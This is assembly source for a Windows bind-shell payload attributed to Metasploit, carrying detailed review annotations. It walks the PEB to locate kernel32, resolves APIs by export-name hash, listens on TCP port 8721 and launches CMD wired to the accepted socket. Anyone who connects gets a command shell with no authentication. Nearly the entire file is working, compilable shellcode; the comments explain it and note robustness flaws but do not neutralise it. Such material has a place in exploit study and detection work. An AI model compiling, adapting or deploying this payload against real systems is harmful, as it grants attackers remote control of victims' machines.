; Title: Win32 Bind Shell
; Platforms: Windows NT 4.0, Windows 2000, Windows XP, Windows 2003
; Function: Listen for connection and spawn command shell
; Author: hdm[at]metasploit.com
; Compile: nasm -f bin -o win32_bind.bin win32_bind.asm
;
; Overview (NASM/Intel syntax, 32-bit, position-independent via call/pop):
;   1. Locate the kernel32.dll base through the PEB loader list (LKernel32Base).
;   2. Resolve ten API addresses by export-name hash (LGetProcAddress); the
;      Winsock subset is resolved after LoadLibraryA("WS2_32.DLL").
;   3. WSAStartup, WSASocketA, bind to 0.0.0.0:8721, listen, accept.
;   4. CreateProcessA("CMD") with stdin/stdout/stderr set to the accepted
;      socket, WaitForSingleObject on the child, closesocket, ExitProcess.
; Resolved addresses are kept on the stack at [ebp+12]..[ebp+48]; the number
; at the end of each hash line below is that slot.
;
; NOTE(review): this is an unauthenticated bind shell -- any peer that can
; reach TCP/8721 gets a command shell running as the exploited process.
; No API return value is checked anywhere in this file (see inline notes),
; so a failed call does not fail safe; it proceeds with a bogus handle.
[BITS 32]
global _start
_start:
LCaller:
call LLoadFunctions ; pushes the address of LDataSegment, which LLoadFunctions pops as the data pointer
LDataSegment:
;========================
; In-line data block, addressed relative to [ebp] (= this address) once
; LLoadFunctions has run. Offsets from LDataSegment:
;   +0   "CMD" padded by dd to 4 bytes -> NUL-terminated command line
;   +4   ten ror-13/add hashes of export names (index 1..10 = [edi + i*4]);
;        the trailing number is the stack slot [ebp+N] receiving the address
;   +44  "WS2_32.DLL\0" for LoadLibraryA
dd "CMD"
dd 0x79c679e7 ; closesocket 12
dd 0x498649e5 ; accept 16
dd 0xe92eada4 ; listen 20
dd 0xc7701aa4 ; bind 24
dd 0xadf509d9 ; WSASocketA 28
dd 0x3bfcedcb ; WSAStartup 32
dd 0xec0e4e8e ; LoadLibraryA 36
dd 0x73e2d87e ; ExitProcess 40
dd 0xce05d9ad ; WaitForSingleObject 44
dd 0x16b3fe72 ; CreateProcessA 48
db "WS2_32.DLL", 0x00, 0x01 ; NUL-terminated DLL name; the extra 0x01 byte does not appear to be referenced by the code
;========================
LLoadFunctions:
; Entered via 'call LLoadFunctions' from _start, so [esp] is the address of
; LDataSegment. Builds a tiny frame: [ebp] = data pointer; the ten resolved
; API addresses are stored at [ebp+12]..[ebp+48], one dword each.
; NOTE(review): those 40 bytes lie ABOVE the current stack pointer, i.e. in
; whatever the caller's stack held -- the shellcode assumes that region is
; writable and no longer needed.
; Register roles from here on: ebp = frame base (never changed again),
; edi = data pointer, ebx = module base handed to LGetProcAddress.
pop ebx ; ebx = address of LDataSegment (the "return address" the call pushed)
push esp ; reserve one slot (its value is replaced two lines down)
mov ebp, esp ; ebp = frame base
mov [ebp], ebx ; [ebp] = data pointer
LKernel32Base:
; Walk the PEB to a module base:
;   fs:[0x30] -> PEB, PEB+0x0c -> Ldr, Ldr+0x1c -> InInitializationOrderModuleList.Flink
; lodsd then follows one more Flink, so the dword read at +0x08 belongs to the
; SECOND entry of that list.
; NOTE(review): that entry is kernel32.dll only on the platforms named in the
; header; later Windows versions order this list differently (commonly cited
; as the reason this idiom breaks on Vista+). Re-validate before reusing.
push byte 0x30
pop ecx ; ecx = 0x30 without a NUL byte in the encoding
mov eax, [fs:ecx] ; eax = PEB
mov eax, [eax + 0x0c] ; eax = PEB->Ldr
mov esi, [eax + 0x1c] ; esi = &first entry's InInitializationOrder links
lodsd ; eax = first entry's Flink = second entry's links
mov ebx, [eax + 0x08] ; ebx = that entry's DllBase (kernel32.dll on the listed platforms)
jmp short LStartLoading
LLoadWinsock:
; Reached from Looper when the counter hits 6: slots 48..36 (the kernel32
; functions) are resolved and eax still holds the last result, LoadLibraryA.
lea edx, [edi + 44] ; edx = address of "WS2_32.DLL" in the data block
push ecx ; save counter (the callee clobbers ecx)
push edx ; lpLibFileName
call eax ; LoadLibraryA("WS2_32.DLL")
mov ebx, eax ; ebx = ws2_32 module base for the remaining lookups
; NOTE(review): a NULL return (load failure) is not checked; LGetProcAddress
; would then read PE headers from address 0.
pop ecx ; restore counter
jmp short Looper2
LStartLoading:
; esi = ebp + 8, so the slot for counter value c is [esi + c*4] = [ebp + 8 + 4c];
; the counter runs 10 down to 1, filling [ebp+48] first and [ebp+12] last.
push byte 0x08
pop esi
add esi, ebp
; Function counter
push byte 0x0a
pop ecx ; ecx = 10 hashes to resolve
mov edi, [ebp] ; edi = data pointer; hash i is at [edi + i*4]
Looper:
cmp cl, 0x06
je short LLoadWinsock ; kernel32 part done -> load ws2_32 before continuing
Looper2:
push ecx ; save the counter
push ebx ; arg 2: module base
push dword [edi + ecx*4] ; arg 1: hash of the export name
call LGetProcAddress ; eax = export VA, or 0 when no name matched the hash
pop ecx ; restore the counter
mov [esi + ecx * 4], eax ; store at [ebp + 8 + ecx*4]
; NOTE(review): eax == 0 is not checked; a 0 slot later becomes an indirect
; call through a null pointer (e.g. on a DLL whose export name changed).
loop Looper ; ecx--, repeat while ecx != 0
xor edi, edi ; edi = 0, the zero argument used by the socket calls below
LWSAStartup:
; WSAStartup(0x101, &wsadata) -- request Winsock 1.1.
; 'sub sp, 400' uses a 16-bit operand so the encoding holds no NUL bytes
; (a 32-bit 'sub esp, 400' would). NOTE(review): it changes only the low 16
; bits of esp, so it reserves the buffer correctly only while
; (esp & 0xffff) >= 400; otherwise sp wraps and esp moves UP. The same caveat
; applies to 'sub sp, 0x54' below.
sub sp, 400 ; reserve the WSADATA buffer
push esp ; lpWSAData
push 0x101 ; wVersionRequested = 1.1
call [ebp + 32] ; WSAStartup(); return value not checked
LWSASocketA:
; WSASocketA(af=2, type=1, protocol=0, lpProtocolInfo=NULL, g=0, dwFlags=0)
push edi ; dwFlags = 0
push edi ; g = 0
push edi ; lpProtocolInfo = NULL
push edi ; protocol = 0
inc edi
push edi ; type = 1 (SOCK_STREAM)
inc edi
push edi ; af = 2 (AF_INET)
call [ebp + 28]
mov ebx, eax ; ebx = listening socket; INVALID_SOCKET on failure is not checked
xor edi, edi
LBind:
; Build a sockaddr_in on the stack and bind(s, &sa, 16).
; Resulting layout at esi: +0 family/port, +4 sin_addr, +8 sin_zero[0..3];
; +12..15 are NOT written (they are whatever sits in the WSADATA buffer).
push edi ; sin_zero[0..3] = 0
push edi ; sin_addr = 0 (INADDR_ANY)
push dword 0x11220002 ; sin_family = 2 (AF_INET), sin_port = bytes 22 11 -> 0x2211 = 8721
mov esi, esp ; esi = &sockaddr_in (reused by accept)
push byte 0x10 ; namelen = 16
push esi ; name
push ebx ; s
call [ebp + 24] ; bind(); NOTE(review): failure (e.g. port already in use) is not detected
LListen:
push edi ; backlog = 0
push ebx ; s
call [ebp + 20] ; listen(); return value not checked
LAccept:
push edi ; addrlen = NULL
push esi ; addr (the sockaddr_in above; overwritten with the peer address)
push ebx ; s
call [ebp + 16] ; accept() blocks until a client connects
mov edx, eax ; edx = accepted socket (INVALID_SOCKET on failure is not checked)
LCreateProcessStructs:
; allocate space for STARTUPINFO, PROCESS_INFORMATION
; Layout after the sub: [esp+0..15] PROCESS_INFORMATION, [esp+16..83] STARTUPINFOA (68 bytes)
sub sp, 0x54 ; 84 bytes (see the 16-bit-sub caveat at LWSAStartup)
; zero out SI/PI
lea edi, [esp]
xor eax, eax
push byte 21
pop ecx ; 21 dwords = 84 bytes
LBZero:
rep stosd ; leaves ecx = 0, which is reused as the NULL/0 arguments below
mov edi, edx ; edi = accepted socket
mov byte [esp + 16], 68 ; si.cb = sizeof(si)
inc byte [esp + 61] ; si.dwFlags = 0x100 (second byte of the dword at si+44) -- STARTF_USESTDHANDLES
; socket handles
mov [esp + 16 + 56], edi ; si.hStdInput  = socket
mov [esp + 16 + 60], edi ; si.hStdOutput = socket
mov [esp + 16 + 64], edi ; si.hStdError  = socket
lea eax, [esp + 16] ; si
; CreateProcessA arguments, pushed right to left (ecx == 0 here):
push esp ; lpProcessInformation = &pi (push esp stores the pre-push value)
push eax ; lpStartupInfo = &si
push ecx ; lpCurrentDirectory = NULL
push ecx ; lpEnvironment = NULL
push ecx ; dwCreationFlags = 0
inc ecx
push ecx ; bInheritHandles = 1, so the child receives the socket handles
dec ecx
push ecx ; lpThreadAttributes = NULL
push ecx ; lpProcessAttributes = NULL
push dword [ebp] ; lpCommandLine = "CMD" from the data block
push ecx ; lpApplicationName = NULL
LCreateProcess:
call [ebp + 48] ; CreateProcessA(); stdcall pops the 10 args so esp points at pi again; return not checked
mov ecx, esp ; ecx = &pi; [ecx] = pi.hProcess
LWaitForSingleObject:
push 0xFFFFFFFF ; dwMilliseconds = INFINITE
push dword [ecx] ; hHandle = pi.hProcess
call [ebp + 44] ; WaitForSingleObject(): block until the shell exits
LCloseSocket:
push edi ; the accepted socket (the listening socket in ebx is never closed)
call [ebp + 12] ; closesocket()
LFinished:
; NOTE(review): no uExitCode is pushed, so ExitProcess takes whatever dword
; is on top of the stack as the exit code. Harmless, but not a chosen value.
call [ebp + 40] ; ExitProcess()
LGetProcAddress:
; eax = LGetProcAddress(hash, module_base)       -- custom convention
; Call as: push module_base; push hash; call LGetProcAddress. The callee
; removes both arguments (ret 8).
; Walks the module's PE export directory, hashing each exported name with
;   h = ror32(h, 13) + byte   over the bytes up to (not including) the NUL,
; and returns the VA of the first name (scanning from the end of the table)
; whose hash equals the argument, or 0 if none matches. edx = module_base on
; return. Preserves ebx, ebp, esi, edi; clobbers eax, ecx, edx, flags, DF (cleared).
; NOTE(review): only the name table is searched, so ordinal-only exports can
; never be found; and nothing detects a forwarder entry, whose RVA points at
; a forwarder string rather than code. Callers in this file do not check for 0.
push ebx
push ebp
push esi
push edi
; After the four pushes: [esp+16] = return address, [esp+20] = hash, [esp+24] = module base
mov ebp, [esp + 24] ; ebp = module base
mov eax, [ebp + 0x3c] ; eax = e_lfanew (offset of the PE signature)
mov edx, [ebp + eax + 120] ; edx = export directory RVA (PE+0x78, data directory entry 0)
add edx, ebp ; edx = &IMAGE_EXPORT_DIRECTORY
mov ecx, [edx + 24] ; ecx = NumberOfNames
mov ebx, [edx + 32] ; ebx = AddressOfNames RVA
add ebx, ebp ; ebx = name-pointer table
LFnlp:
; Scan names from last to first; ecx = number of names still untested.
jecxz LNtfnd ; none left -> not found
dec ecx ; ecx = index of the name to test now
mov esi, [ebx + ecx * 4] ; esi = name RVA
add esi, ebp ; esi = name string
xor edi, edi ; edi = running hash
cld ; lodsb must advance esi forward
LHshlp:
xor eax, eax ; eax = 0, so ah is 0 for the NUL test
lodsb ; al = next name byte
cmp al, ah ; NUL terminator reached?
je LFnd
ror edi, 13
add edi, eax ; h = ror(h, 13) + byte
jmp short LHshlp
LFnd:
cmp edi, [esp + 20] ; hash of this name == requested hash?
jnz LFnlp
mov ebx, [edx + 36] ; AddressOfNameOrdinals RVA
add ebx, ebp
mov cx, [ebx + 2 * ecx] ; cx = ordinal (16-bit); bits 16..31 of ecx keep the index's upper half, which is 0 as long as NumberOfNames < 0x10000
mov ebx, [edx + 28] ; AddressOfFunctions RVA
add ebx, ebp
mov eax, [ebx + 4 * ecx] ; eax = function RVA
add eax, ebp ; eax = function VA
jmp short LDone
LNtfnd:
xor eax, eax ; not found -> 0
LDone:
mov edx, ebp ; edx = module base (secondary return value)
pop edi
pop esi
pop ebp
pop ebx
ret 8 ; discard hash and module_base